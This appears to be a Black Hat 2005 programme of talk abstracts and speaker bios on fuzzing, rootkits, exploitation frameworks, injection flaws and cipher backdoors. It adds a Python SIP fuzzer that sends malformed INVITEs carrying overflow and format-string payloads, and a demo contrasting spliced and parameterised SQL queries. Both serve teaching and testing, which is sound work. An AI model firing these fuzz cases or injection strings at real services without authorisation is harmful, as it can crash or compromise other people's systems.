The computer and network security fields have made little progress in the past decade. The rhetoric that the field is in an arms race; attacks are becoming more complicated and thus defenses are always in a keep-up situation makes little sense when 10 year old root kits, BGP and DNS attacks that have been widely publicized for years, and plain-text communications streams are still being taken advantage of. This talk looks at the environment without being skewed by currently marketed solutions. It then presents corollaries for environments in different disciplines, such as economics and physics, talks to certain psychological situations that prohibit researchers and organizations from being able to correctly address the problems, maps these solutions into Counter Intelligence and Counter Espionage models and finally applies them to low level network and systems communications. This presentation involves audience participation to point out ways of breaking the helplessness cycle (for the defensive side) or to better target areas for exploitation (for the offensive side).

"Mudge" - Peiter Mudge Zatko
Better known as Mudge, the hacker who testified to the Senate that he could "take the Internet down in 30 minutes", Zatko has been a pioneer of the commercial information security and warfare sector since the 1980s. The leader of the hacker think-tank "L0pht", he founded @stake and Intrusic and currently works as a Division Scientist for BBN Technologies (the company that designed and built the Internet).

Mudge is the creator of L0phtCrack - the premier MS password auditor, SLINT - the first source code vulnerability auditing system, AntiSniff - the first commercial promiscuous system network detection tool, and Zephon - Intrusic's flagship product focused on Counter Intelligence / Counter Espionage for corporate Insider-Threat. His other software works are now included in several distributions of commercial and public domain operating systems.

As a lecturer and advisor Mudge has contributed to the CIA's critical National security mission, was recognized as a vital contributor to the success of the President's Scholarship for Service Program by the NSC, has briefed Senators, the former Vice President and President of the United States, and has provided testimony to the US Senate multiple times.

An honorary plank owner of the USS McCampbell and referenced as part of 'U.S. History' in Trivial Pursuit, his mission remains constant to "make a dent in the universe".


The Art of SIP fuzzing and Vulnerabilities Found in VoIP
Ejovi Nuwere, Founder, SecurityLab Technologies
Mikko Varpiola, Head, Test Tool Development, Codenomicon

This presentation will cover SIP and VoIP related automated fuzzing techniques. Using real world vulnerabilities and audit engagements we will give a technical understanding of this emerging technology and its common attack vectors.

The techniques discussed in this talk will not be limited to SIP but will apply to methodical audit approaches for fuzzing text-based protocols, which can be more complex than fuzzing binary protocols.

This talk will include:

  • 0 day vulnerabilities (or one day)
  • Example fuzzing scripts
  • Proof of concept code
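An added example of the text-protocol problem the talk raises, written for this page rather than taken from SecurityLab or Codenomicon: a SIP INVITE is a set of structured text fields, so a useful case must break one field while leaving the rest valid enough for the stack to parse down to it, and Content-Length has to be recomputed for a mutated body unless the mismatch is itself the case. The message, addresses and anomaly payloads are constructed; the anomaly classes (overlong, format string, NUL, high-bit, empty, integer boundaries, structural breakage) are the usual ones and not a claim about which of them found the talk's vulnerabilities.

```python
import socket

# A well-formed INVITE, constructed for this example (documentation addresses,
# not real endpoints).  Headers stay an ordered list so one field can be
# replaced while the rest of the message stays parseable.
REQUEST_LINE = "INVITE sip:bob@example.com SIP/2.0"
BASE_HEADERS = [
    ("Via", "SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds"),
    ("Max-Forwards", "70"),
    ("To", "Bob <sip:bob@example.com>"),
    ("From", "Alice <sip:alice@example.com>;tag=1928301774"),
    ("Call-ID", "a84b4c76e66710@192.0.2.10"),
    ("CSeq", "314159 INVITE"),
    ("Contact", "<sip:alice@192.0.2.10>"),
    ("Content-Type", "application/sdp"),
]
BASE_BODY = ("v=0\r\n"
             "o=alice 2890844526 2890844526 IN IP4 192.0.2.10\r\n"
             "s=-\r\n"
             "c=IN IP4 192.0.2.10\r\n"
             "t=0 0\r\n"
             "m=audio 49170 RTP/AVP 0\r\n")

# Anomaly classes a text-protocol fuzzer cycles through for every field.
ANOMALIES = {
    "long": "A" * 4096,        # fixed-size buffers, lengths kept in 8/16-bit ints
    "fmt": "%s%s%n%n%x%x",     # value that reaches a printf-style formatter
    "nul": "bob\x00evil",      # C-string truncation vs length-counted parsing
    "high": "\xff" * 64,       # non-ASCII through charset conversions
    "empty": "",               # mandatory field present but empty
}


def build_message(request_line=REQUEST_LINE, headers=None, body=BASE_BODY,
                  content_length=None):
    """Assemble request line, headers and body.  Content-Length is recomputed so
    a mutated body still frames correctly, unless the caller deliberately passes
    a wrong one (that mismatch is a test case in its own right)."""
    headers = BASE_HEADERS if headers is None else headers
    raw_body = body.encode("latin-1")      # latin-1: every \x00..\xff is one byte
    length = len(raw_body) if content_length is None else content_length
    lines = [request_line] + ["%s: %s" % h for h in headers]
    lines += ["Content-Length: %d" % length, "", ""]
    return "\r\n".join(lines).encode("latin-1") + raw_body


def _with(headers, name, value):
    """Copy of `headers` with the first header called `name` replaced."""
    out, done = [], False
    for k, v in headers:
        if k == name and not done:
            out.append((k, value))
            done = True
        else:
            out.append((k, v))
    return out


def generate_cases():
    """Dict of case name -> bytes on the wire.  Each case breaks exactly one thing."""
    cases = {"baseline": build_message()}
    # 1. Field-level anomalies: one header at a time, everything else valid, so
    #    the stack gets far enough to touch the field under test.
    for name, _ in BASE_HEADERS:
        for label, payload in ANOMALIES.items():
            cases["%s-%s" % (name.lower(), label)] = build_message(
                headers=_with(BASE_HEADERS, name, payload))
    # 2. Integer boundaries in fields the stack must convert to numbers.
    for label, n in (("zero", 0), ("neg", -1), ("u32", 2 ** 32), ("u64", 2 ** 64)):
        cases["cseq-%s" % label] = build_message(
            headers=_with(BASE_HEADERS, "CSeq", "%d INVITE" % n))
        cases["content-length-%s" % label] = build_message(content_length=n)
    # 3. Structural breakage the grammar does not allow.
    cases["via-dup"] = build_message(headers=BASE_HEADERS + [BASE_HEADERS[0]] * 50)
    cases["no-cseq"] = build_message(headers=[h for h in BASE_HEADERS if h[0] != "CSeq"])
    cases["bare-lf"] = build_message().replace(b"\r\n", b"\n")
    cases["truncated"] = build_message()[:40]
    cases["reqline-long"] = build_message(
        request_line="INVITE sip:%s@example.com SIP/2.0" % ("b" * 8192))
    cases["bad-version"] = build_message(request_line="INVITE sip:bob@example.com SIP/99.0")
    cases["body-long"] = build_message(body=BASE_BODY + "a=" + "x" * 65000 + "\r\n")
    return cases


def send_case(target, message, timeout=1.0):
    """Fire one case at a SIP/UDP endpoint; return the reply, or None on silence
    (a crashed or hung stack usually shows up as silence on the following cases)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(message, target)
        try:
            return s.recvfrom(65535)[0]
        except socket.timeout:
            return None
```

Run the cases in order against a test instance and send the baseline again after each one: a baseline that stops getting a 100 Trying or 4xx back tells you which case took the stack down, which is the signal that turns a mutation list into a finding.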

Ejovi Nuwere is the founder of SecurityLab Technologies. Nuwere gained media attention and international recognition for his highly publicized security audit of Japan's National ID system, JukiNet. Nuwere is the Chief Technology Officer of SecurityLab Technologies, where he heads the company's VoIP security auditing group. He currently lives in Boston and is working on his second book, Practical Penetration Testing (O'Reilly).

Mikko Varpiola is the head of test tool development at Codenomicon. His specific area of expertise is in anomaly design, i.e. what to feed into software to make it fail. Before Codenomicon he worked as a researcher in the acclaimed PROTOS project at Oulu University Secure Programming Group (OUSPG).


[ Back-up Speaker ]
Stopping Automated Application Tools and their Attacks

Gunter Ollmann, Professional Services Director, Next Generation Security Software Limited

Relying on client-side scripting as a positive security mechanism has generally been regarded as not a particularly smart idea: after all, it can be bypassed by the attacker. Unfortunately this is an outdated view. With a little understanding, client-side code can be turned into an effective weapon capable of combating the latest generation of application assessment tools and most automated attack vectors.

This talk covers the methods application developers and security departments have at their disposal to halt (and sometimes break) an attack being conducted by an automated tool or script, whether the attack is initiated from a single host or from a distributed network.

Gunter Ollmann is the Professional Services Director at NGSSoftware, the world’s most renowned security vulnerability research company. Focusing upon web application security and penetration testing, and having previously been the EMEA head of X-Force Security Assessment Services for ISS, he balances his time between security consulting from an attack perspective, business development and research into next-generation attack vectors.

Gunter is a frequent security contributor with over twenty key technical whitepapers published in the last 4 years on topics ranging from URL encoded attacks through to wireless security and second-order code injection.  His authoritative paper on phishing—“The Phishing Guide”—was voted one of the top technical whitepapers of 2004.

A frequently invited speaker, over the years Gunter has presented to conference audiences including the UK Ministry of Defence, GCHQ, InfoSec, Compsec, OWASP, and many more. He has written security articles and provided expert comment for many of the top security and computing magazines, as well as writing his own column “Consultants Corner” in SC Magazine for the last few years.


Injection Flaws: Stop Validating Your Input
Mike Pomraning, CISSP, Project Manager, Infrastructure, SecurePipe, Inc.

Years after the debut of XSS and SQL Injection, each passing week sees newly disclosed vulnerabilities ready to be exploited by these same techniques. Labelling all of these as "input validation flaws" isn't helping anymore. In this Turbo Talk we turn the situation upside-down to get a better perspective, and cover specific techniques to address the problems.
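To show the turned-around view the abstract promises, here is an added example (not Pomraning's code): the same payload against a string-spliced query, the same query behind a quote-stripping "validator", a numeric context where that validator is irrelevant, and the parameterised and output-encoded forms, which fix the flaw where data meets the interpreter instead of policing what the data looks like. The table rows are constructed; the remedies are the standard ones and are not attributed to the talk.

```python
import html
import sqlite3


def make_db():
    """In-memory table with constructed rows, one of them with a legitimate apostrophe."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "alice@example.com"),
        ("O'Brien", "obrien@example.com"),
    ])
    return conn


# --- SQL: the flaw is where data meets the interpreter, not what the data looks like

def find_user_unsafe(conn, name):
    """Input spliced into the statement text: SQLite cannot tell data from code."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def quote_filter(value):
    """The 'validate the input' reflex: strip the characters that broke the last
    query.  It is tied to one context (a single-quoted string) and mangles honest data."""
    return value.replace("'", "").replace("--", "")


def find_by_id_unsafe(conn, user_id):
    """Numeric context: no quotes involved, so quote_filter() is no defence at all."""
    return conn.execute("SELECT name FROM users WHERE rowid = " + user_id).fetchall()


def find_user_safe(conn, name):
    """The parameter travels out of band; the statement's structure is fixed before
    any value arrives, so O'Brien and ' OR '1'='1 are both just names."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def find_by_id_safe(conn, user_id):
    """Type conversion is the only 'validation' the numeric context needs."""
    return conn.execute("SELECT name FROM users WHERE rowid = ?", (int(user_id),)).fetchall()


# --- HTML: same flaw, different interpreter; the fix is encoding for the output context

def render_unsafe(comment):
    return "<p>" + comment + "</p>"


def render_safe(comment):
    """Encode at the point of output, for the context the value lands in (HTML text)."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"
```

The same string is harmless in the parameterised query, dangerous in the spliced one, and mangled by the filter; nothing about the string itself decides which, only where it is inserted. That is why labelling both the SQL and the HTML case "input validation" points at the wrong place.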

Mike Pomraning is a systems and process troubleshooter, finding trouble and shooting it. He works for SecurePipe, Inc., a managed security services provider, and holds a CISSP. He prefers to debug application misbehavior with code traces, kernel traces and packet dumps, though at higher layers he prefers dialogue and audit. Along the way has written a few helpful programs, including pynids, a python wrapper to the libnids NIDS framework, and more perl than he can recall.


Automation - Deus ex Machina or Rube Goldberg Machine?

How far can automation be taken? How much intelligence can be embodied in code? How generic can automated IT security assessment tools really be? This presentation will attempt to show which areas of attacks lend themselves to automation and which aspects should best be left for manual human inspection and analyses.

SensePost will provide the audience a glimpse of BiDiBLAH - an attempt to automate a focussed yet comprehensive assessment. The tool provides automation for:

  • Finding networks and targets
  • Fingerprinting targets
  • Discovering known vulnerabilities on the targets
  • Exploiting the vulnerabilities found
  • Reporting

Roelof Temmingh is the Technical Director of SensePost where his primary function is that of external penetration specialist. Roelof is internationally recognized for his skills in the assessment of web servers. He has written various pieces of Perl code as proof of concept for known vulnerabilities, and coded the world-first anti-IDS web proxy "Pudding". He has spoken at many international conferences and in the past year alone has been a keynote speaker at SummerCon (Holland) and a speaker at the Black Hat Briefings. Roelof drinks tea and smokes Camels.

Haroon Meer is currently SensePost's Director of Development (and coffee drinking). He specializes in the research and development of new tools and techniques for network penetration and has released several tools, utilities and white-papers to the security community. He has been a guest speaker at many security forums including the Black Hat Briefings. Haroon doesn't drink tea or smoke Camels.

Charl van der Walt is a founder member of SensePost. He studied Computer Science at UNISA, Mathematics at the University of Heidelberg in Germany and has a Diploma in Information Security from the Rand Afrikaans University. He is an accredited BS7799 Lead Auditor with the British Institute of Standards in London. Charl has a number of years experience in Information Security and has been involved in a number of prestigious security projects in Africa, Asia and Europe. He is a regular speaker at seminars and conferences nationwide and is regularly published on internationally recognized forums like SecurityFocus. Charl has a dog called Fish.

The Jericho Challenge - Finalist Architecture Presentations and Awards
Paul Simmonds, CISO of ICI and Executive Director, the Jericho Forum

The days of the corporate network, completely isolated with a well-secured outer shell are long gone; yet we continue to cling to this model. Global networks with no borders, offer the potential of substantial savings in communications costs, maximum network agility and instant connectivity for clients and partners.

Can you secure this incredibly compelling business model, and provide a long-term business case for security where security contributes to the corporate bottom line? Can the CISO be seen as a true partner in corporate strategic thinking? What does business need from its suppliers to make this a feasible reality? What do you need to be doing now to achieve this goal?

The Jericho Challenge is an industry-wide competition for secure architecture design and related Jericho compliance concepts, available at The top three finalists will present their papers during this session. Judges will give cash awards to the papers that contribute most to the debate on Jericho Architecture. Contact for entrance rules and regulations.

Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI, working for the CIO Office in London.

Prior to joining ICI he spent a short time with a high-security European web hosting company as Head of Information Security, and before that seven years with Motorola, again in a global information security role. Paul is also a founding member of the Jericho Forum, a pan-global grouping of corporate companies working to define the issues and benefits of operating in a deperimeterised environment.

In his career he has worked with many external agencies, including the FBI, Scotland Yard, Wiltshire Computer Crime and Wiltshire Child protection. He has also been directly involved in two successful criminal prosecutions, giving evidence in one case.

Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication and is also a qualified kayak coach. He came to the Information Security field from a background in IT Systems Implementation and consultancy during which he wrote and implemented one of the UK's first web sites.

He is married with three children and a very understanding wife and in the little spare time that he has teaches canoeing and runs charity radio stations.

Windows Internals: Understanding Security Changes in Windows XP Service Pack 2
Window Snyder, Senior Security Strategist, Microsoft

This session demonstrates previously unreleased detail around the broad scope of the changes in Windows XP Service Pack 2 (SP2). This includes the most relevant security mitigations, the Windows ship process, and a change in how Microsoft communicates details to the security community. This session also gives detail for what changed in Windows Server 2003 Service Pack 1 and why you need to start planning to deploy immediately.

Window Snyder is a Senior Security Strategist at Microsoft in the Security Engineering and Communications organization. She manages the outreach strategy for security researchers and security vendors. Previously she was responsible for security sign-off for Windows XP SP2 and Windows Server 2003.

Prior to joining Microsoft, Ms. Snyder was Director of Security Architecture at @stake. She developed application security analysis methodologies and led the Application Security Center of Excellence. She was a software engineer for 5 years focused primarily on security applications, most recently at Axent Technologies, now Symantec.

Ms. Snyder is co-author of "Threat Modeling", a manual for security architecture analysis in software.

eEye BootRoot
Derek Soeder, Software Engineer, eEye Digital
Ryan Permeh, Senior Software Engineer, eEye Digital Security

This presentation will cover the eEye BootRoot project, an exploration of technology that boot sector code can use to subvert the Windows NT-family kernel and retain the potential for execution, even after Windows startup—a topic made apropos by the recent emergence of Windows rootkits into mainstream awareness. We will provide some brief but technical background on the Windows startup process, then discuss BootRoot and related technology, including a little-known stealth technique for low-level disk access. Finally, we will demonstrate the proof-of-concept BootRootKit, loaded from a variety of bootable media.

Derek Soeder is a Software Engineer and after-hours researcher at eEye Digital Security. In addition to participating in the ongoing development of eEye's Retina Network Security Scanner product, Derek has also produced a number of internal technologies and is responsible for the discovery of multiple serious security vulnerabilities. His main areas of interest include operating system internals and machine code-level manipulation.

Ryan Permeh is a Senior Software Engineer at eEye Digital Security. He focuses mainly on the Retina and SecureIIS product lines. He has worked in the porting of nmap and libnet to Windows, as well as helping with disassembly and reverse engineering, and exploitation efforts within the eEye research team.

“Shadow Walker” — Raising The Bar For Rootkit Detection
Sherri Sparks
Jamie Butler, Director of Engineering, HBGary

Last year at Black Hat, we introduced the rootkit FU. FU took an unprecedented approach to hiding, not previously seen in a Windows rootkit. Rather than patching code or modifying function pointers in well-known operating system structures like the system call table, FU demonstrated that it was possible to control the execution path indirectly by modifying private kernel objects in memory. This technique was coined DKOM, or Direct Kernel Object Manipulation. The difficulty in detecting this form of attack caused concern for anti-malware developers. This year, FU teams up with Shadow Walker to raise the bar for rootkit detectors once again. In this talk we will explore the idea of memory subversion. We demonstrate that it is not only possible to hide a rootkit driver in memory, but that it is possible to do so with a minimal performance impact. The application (threat) of this attack extends beyond rootkits. As bug hunters turn toward kernel-level exploits, we can extrapolate its application to worms and other forms of malware. Memory scanners, beware the axiom 'videre est credere'. Let us just say that it does not hold the same way that it used to.

Sherri Sparks is a PhD student at the University of Central Florida. She received her undergraduate degree in Computer Engineering and subsequently switched to Computer Science after developing an interest in reverse code engineering and computer security. She also holds a graduate certificate in Computer Forensics. Currently, her research interests include offensive / defensive malicious code technologies and related issues in digital forensic applications.

Jamie Butler is the Director of Engineering at HBGary, Inc. specializing in rootkits and other subversive technologies. He is the co-author and a teacher of "Aspects of Offensive Rootkit Technologies" and co-author of the upcoming book "Rootkits: Subverting the Windows Kernel" due out late July. Prior to accepting the position at HBGary, he was a senior developer on the Windows Host Sensor at Enterasys Networks, Inc. and a computer scientist at the NSA. He holds an MS in CS from UMBC and has published articles in the IEEE IA Workshop proceedings, Phrack, USENIX ;login:, and Information Management and Computer Security. Over the past few years his focus has been on Windows servers, concentrating on host-based intrusion detection and prevention, buffer overflows, and reverse engineering. Jamie is also a contributor at

Beyond EIP
spoonm & skape

When we built Metasploit, our focus was on the exploit development process. We tried to design a system that helped create reliable and robust exploits. While this is obviously very important, it's only the first step in the process. What do you do once you own EIP? Our presentation will concentrate on the recent advancements in shellcode, IDS/firewall evasion, and post-exploitation systems. We will discuss the design and implementation of the technologies that enable complex payloads, such as VNC injection, and the suite of tools we've built upon them. We will then present a glimpse of the next generation of Metasploit, and how these new advances will serve as its backbone.

Since late 2003, spoonm has been one of the core developers behind the Metasploit Project. He is responsible for much of the architecture in version 2.0, as well as other components including encoders, nop generators, and a polymorphic shellcode engine. A full-time student at a northern university, spoonm spends too much of his free time on security research projects.

Skape is a lead software developer by day and an independent security researcher by night. He joined forces with the Metasploit project in 2004 where his many contributions have included the Meterpreter, VNC injection, and many other payload advances. Skape has worked on a number of open-source projects and has authored several papers on security related technologies. His current security related interests include post-exploitation technologies, payload development and optimization, and exploitation prevention technology.

Attacking Web Services: The Next Generation of Vulnerable Enterprise Apps
Alex Stamos, Founding Partner, Information Security Partners
Scott Stender, Founding Partner, Information Security Partners

Web Services represent a new and unexplored set of security-sensitive technologies that have been widely deployed by large companies, governments, financial institutions, and in consumer applications. Unfortunately, the attributes that make web services attractive, such as their ease of use, platform independence, use of HTTP and powerful functionality, also make them a great target for attack.

In this talk, we will explain the basic technologies (such as XML, SOAP, and UDDI) upon which web services are built, and explore the innate security weaknesses in each.  We will then demonstrate new attacks that exist in web service infrastructures, and show how classic web application attacks (SQL Injection, XSS, etc…) can be retooled to work with the next-generation of enterprise applications.

The speakers will also demonstrate some of the first publicly available tools for finding and penetrating web service enabled systems.

Alex Stamos is a founding partner of iSEC Partners, LLC, a strategic digital security organization, with several years experience in security and information technology.  Alex is an experienced security engineer and consultant specializing in application security and securing large infrastructures, and has taught many classes in network and application security.

Before he helped form iSEC Partners, Alex spent two years as a Managing Security Architect with @stake.  Alex performed as a technical leader on many complex and difficult assignments, including a thorough penetration test and architectural review of a 6 million line enterprise management system, a secure re-design of a multi-thousand host ASP network, and a thorough analysis and code review of a major commercial web server.  He was also one of @stake’s West Coast trainers, educating select technical audiences in advanced network and application attacks.

Before @stake, Alex had operational security responsibility over 50 Fortune-500 web applications.  He has also worked at a DoE National Laboratory.  He holds a BSEE from the University of California, Berkeley, where he participated in research projects related to distributed secure storage and automatic C code auditing.

Scott Stender is a founding partner of iSEC Partners, LLC, a strategic digital security organization.  Scott brings with him several years of experience in large-scale software development and security consulting.  Prior to iSEC, Scott worked as an application security analyst with @stake where he led and delivered on many of @stake’s highest priority clients.

Before @stake, Scott worked for Microsoft Corporation where he was responsible for security and reliability analysis for one of Microsoft’s distributed enterprise applications.  In this role, Scott drew on his technical expertise in platform internals, server infrastructure, and application security, combined with his understanding of effective software development processes to concurrently improve the reliability, performance, and security of a product running on millions of computers worldwide.

In his research, Scott focuses on secure software engineering methodology and security analysis of core technologies.  Most recently, Scott was published in the January-February 2005 issue of "IEEE Security & Privacy", where he co-authored a paper entitled "Software Penetration Testing".  He holds a BS in Computer Engineering from the University of Notre Dame.

The Art of File Format Fuzzing
Michael Sutton, Director, iDEFENSE Labs
Adam Greene, Senior Security Engineer, iDEFENSE

In September 2004, much hype was made of a buffer overflow vulnerability that existed in the Microsoft engine responsible for processing JPEG files. While the resulting vulnerability itself was nothing new, the fact that a vulnerability could be triggered by a non-executable file commonly traversing public and private networks was reason for concern. File format vulnerabilities are emerging as an increasingly frequent attack vector. These attacks take advantage of the fact that an exploit can be carried within non-executable files that were previously considered to be innocuous. As a result, firewalls and border routers rarely prevent the files from entering a network when included as email attachments or downloaded from the Internet.

As with most vulnerabilities, discovering file format attacks tends to be more art than science. We will present various techniques that utilize file format fuzzing, ranging from pure brute-force fuzzing to intelligent fuzzing that requires an understanding of the targeted file formats. We will present a methodology for approaching this type of research and address issues such as automating the process. Techniques will be discussed to address challenges such as attacking proprietary file formats, overcoming exception handling and reducing false positives. The presentation will include demonstrations of fuzzing tools designed for both the *nix and Windows platforms that will be released at the conference, and the disclosure of vulnerabilities discovered during the course of our research.

Michael Sutton is a Director for iDEFENSE, a security intelligence company located in Reston, VA. He heads iDEFENSE Labs and the Vulnerability Aggregation Team (VAT). iDEFENSE Labs is the research and development arm of the company, which is responsible for discovering original security vulnerabilities in hardware and software implementations, while VAT focuses on researching publicly known vulnerabilities. His other responsibilities include developing tools and methodologies to further vulnerability research, and managing the iDEFENSE Vulnerability Contributor Program (VCP).

Prior to joining iDEFENSE, Michael established the Information Systems Assurance and Advisory Services (ISAAS) practice for Ernst & Young in Bermuda. He is a frequent presenter at information security conferences.

Michael obtained his Certified Information Systems Auditor (CISA) designation in 1998 and is a member of Information Systems Audit and Control Association (ISACA). He has completed a Master of Science in Information Systems Technology degree at George Washington University, has a Bachelor of Commerce degree from the University of Alberta and is a Chartered Accountant. Outside of the office, he is a Sergeant with the Fairfax Volunteer Fire Department.

Adam Greene is a Security Engineer for iDEFENSE, a security intelligence company located in Reston, VA.  His responsibilities at iDEFENSE include researching original vulnerabilities and developing exploit code as well as verifying and analyzing submissions to the iDEFENSE Vulnerability Contributor Program.

His interests in computer security lie mainly in reliable exploitation methods, fuzzing, and UNIX based system auditing and exploit development.  In his time away from computers he has been known to enjoy tea and foosball with strange old women.

Ozone HIPS: Unbreakable Windows
Eugene Tsyrklevich

Windows is the number one target on the Internet today. It takes less than 5 minutes for an unpatched Windows machine, connected to the Internet, to get owned. Yet the most prevalent security practices still consist of running anti-viruses and constant patching.

This presentation introduces a new tool, called Ozone, that is designed to protect against most of the commonly exploited attack vectors. To protect against the most common of these, buffer overflows, Ozone uses an address space randomization technique. In addition, Ozone runs all processes in a sandbox that severely limits what a compromised process is allowed to do. Finally, Ozone protects itself and the underlying operating system against further attacks.

Eugene Tsyrklevich has an extensive security background ranging from designing and implementing Host Intrusion Prevention Systems to training people in research, corporate, and military environments. Eugene has presented his research at a number of security conferences including Usenix Security, BlackHat Europe and BlackHat USA. Eugene holds both a Bachelor and a Masters degree in Computer Science from the University of California, San Diego.

World Exclusive – Announcing the OWASP Guide To Securing Web Applications and Services 2.0
Andrew van der Stock, Technical Editor, OWASP Guide 2.0, OWASP Foundation

After three years of community development, the Open Web Application Security Project (OWASP) is proud to introduce the next generation of web application security standards at BlackHat USA 2005. The Guide to Securing Web Applications and Services 2.0 is a major new release – written from the ground up, with many new sections covering common and emerging risks, including:

  • How to design more secure software
  • How to conduct a security review using the Guide
  • How to perform the most difficult web application processes correctly: processing credit cards, interacting with payment gateways (such as PayPal), and anti-phishing controls
  • Reorganized and easily navigated chapters on web application controls including: web services, comprehensive authentication and authorization controls, session management, data validation, interpreter injection, and many new controls within existing chapters
  • Secure configuration and deployment
  • And software quality assurance.

The Guide has adopted and extended the popular OWASP Top 10 approach – security objectives, how to identify if you are at risk, with recommended remediations in three popular frameworks, and further reading. The Guide is platform neutral, and has examples in J2EE, ASP.NET and PHP. The Guide 2.0 is on the conference materials CD-ROM in its entirety. As it is free (as in beer as well as in freedom), you can redistribute or print it as often as you wish.

To demonstrate the incredible versatility of the Guide and its pragmatic approach, we will be conducting a live security review of software selected at random by the audience. To perform the review demonstration, we will be using just a few off-the-shelf web development tools with Firefox to demonstrate how easy it is to subvert the average application, and how simple it is to fix issues properly by using the Guide.

We expect this talk will be useful to all attendees, but those who set secure coding standards within their organization, manage risk from custom software, manage software development or are software architects or developers will benefit the most from attending this session.

Andrew van der Stock is among the many contributors to the OWASP project over the years. Andrew has presented at many conferences, including BlackHat USA,, and AusCERT, and is a leading Australian web application researcher. He helps run the OWASP Melbourne chapter, started the OWASP Sydney chapter, and is ex-President of SAGE-AU, the System Administrator’s Guild of Australia. You can read more about OWASP, the Open Web Application Security Project at and you can read more about Andrew at  

Preventing Child Neglect in DNSSEC-bis using Lookaside Validation
Paul Vixie

Paul Vixie has been contributing to Internet protocols and UNIX systems as a protocol designer and software architect since 1980. Early in his career, he developed and introduced sends, proxynet, rtty, cron and other lesser-known tools.

Today, Paul is considered the primary modern author and technical architect of BINDv8, the Berkeley Internet Name Domain version 8, the open source reference implementation of the Domain Name System (DNS). He formed the Internet Software Consortium (ISC) in 1994, and now acts as Chairman of its Board of Directors. The ISC reflects Paul's commitment to developing and maintaining production-quality open source reference implementations of core Internet protocols.

More recently, Paul cofounded MAPS LLC (Mail Abuse Prevention System), a California nonprofit company established in 1998 with the goal of hosting the RBL (Realtime Blackhole List) and stopping the Internet's email system from being abused by spammers. Vixie is currently the Chief Technology Officer of Metromedia Fiber Network Inc (MFNX.O).

Along with Frederick Avolio, Paul co-wrote "Sendmail: Theory and Practice" (Digital Press, 1995). He has authored or co-authored several RFCs, including a Best Current Practice document on "Classless IN-ADDR.ARPA Delegation" (BCP 20). He is also responsible for overseeing the operation of, one of the thirteen Internet root domain name servers.

Owning Anti-Virus: Weaknesses in a Critical Security Component
Alex Wheeler, Independent Security Consultant
Neel Mehta, X-Force Research Engineer, Internet Security Systems

AV software is becoming extremely popular because of its perceived protection. Even the average person is aware they want AV on their computer (see AOL, Netscape, Netzero, Earthlink, and other ISP television ads). What if, instead of protecting people from hackers, AV software was actually making it easier for hackers?

This talk will outline general binary auditing techniques using AV software as an example, and demonstrate examples of remote AV vulnerabilities discovered using those techniques.

Alex Wheeler is a security researcher who specializes in reverse engineering binaries for security vulnerabilities. His research experience was cultivated during his time with ISS X-Force, which he spent auditing critical network applications and technologies for security vulnerabilities. Alex's recent audit focus on AV products has led to the discovery of serious systemic and point vulnerabilities in many major AV products.

Neel Mehta works as an application vulnerability researcher at ISS X-Force, and like many other security researchers comes from a reverse-engineering background. His reverse engineering experience was cultivated through extensive consulting work in the copy protection field, and has more recently been focused on application security. Neel has done extensive research into binary and source-code auditing, and has applied this knowledge to find many vulnerabilities in critical and widely deployed network applications.

Building Robust Backdoors In Secret Symmetric Ciphers
Adam L. Young, Ph.D, Senior Managing Consultant, LECG

This talk will present recent advances in the design of robust cryptographic backdoors in secret symmetric ciphers (i.e., classified or proprietary ciphers). The problem directly affects end-users since corporations and governments have in the past produced secret symmetric ciphers for general use (e.g., RC4 and Skipjack, respectively).

The problem itself is challenging since it involves leaking secret key material in the ciphertexts that are produced by a deterministic function, whereas traditional subliminal channels have relied on the use of randomized cryptographic algorithms. Such attacks can be regarded as advanced Trojan horse attacks since the secret block cipher securely and subliminally transmits the symmetric key of the sender and receiver to the malicious designer and confidentiality holds even when the cipher is made public. The material that will be surveyed was published in Fast Software Encryption (FSE '98), the Australasian Conference on Information Security and Privacy (ACISP '03), and Selected Areas in Cryptography (SAC '04).

Adam Young received his BS degree in Electrical Engineering from Yale University in '94, his MS degree in Computer Science from Columbia University in '96. He was awarded his PhD degree in Computer Science with distinction from Columbia University in '02. He has authored publications in IEEE Foundations of Computer Science, Crypto, Eurocrypt, Asiacrypt, Security in Communication Networks (SCN), Fast Software Encryption, Algorithmic Number Theory Symposium (ANTS), PKC, CT-RSA, SAC, IEEE Security & Privacy, Cryptographic Hardware and Embedded Systems (CHES), ACISP, and the IEEE Information Assurance Workshop.

He is the author of the book "Malicious Cryptography: Exposing Cryptovirology" that is co-authored with Dr. Moti Yung. Adam has given invited talks at Xerox PARC, MITRE, Bell Labs, NYU, Sandia National Labs, the Naval Postgraduate School, the AMS-MMS special session on coding theory and cryptography, and the 2nd International Conference on Advanced Technologies for Homeland Security (ICATHS '04). In April Adam will be giving a talk at the DIMACS Workshop on Theft in E-Commerce that is being held at Rutgers University.

Adam's work experience includes serving as a cryptographic consultant for CertCo, Inc., performing research for Lucent as a Member of Technical Staff, acting as a Principal Engineer for Lockheed Martin Global Telecommunications, and conducting Federally funded research for the DoD.

The Unveiling of My Next Big Project
Philip R. Zimmermann, Creator, Pretty Good Privacy

Philip R. Zimmermann is the creator of Pretty Good Privacy. For that, he was the target of a three-year criminal investigation, because the government held that US export restrictions for cryptographic software were violated when PGP spread all around the world following its 1991 publication as freeware. Despite the lack of funding, the lack of any paid staff, the lack of a company to stand behind it, and despite government persecution, PGP nonetheless became the most widely used email encryption software in the world.

Phil has been working on a new project and plans to have freeware ready for all Black Hat attendees.

(c) 1996-2007 Black Hat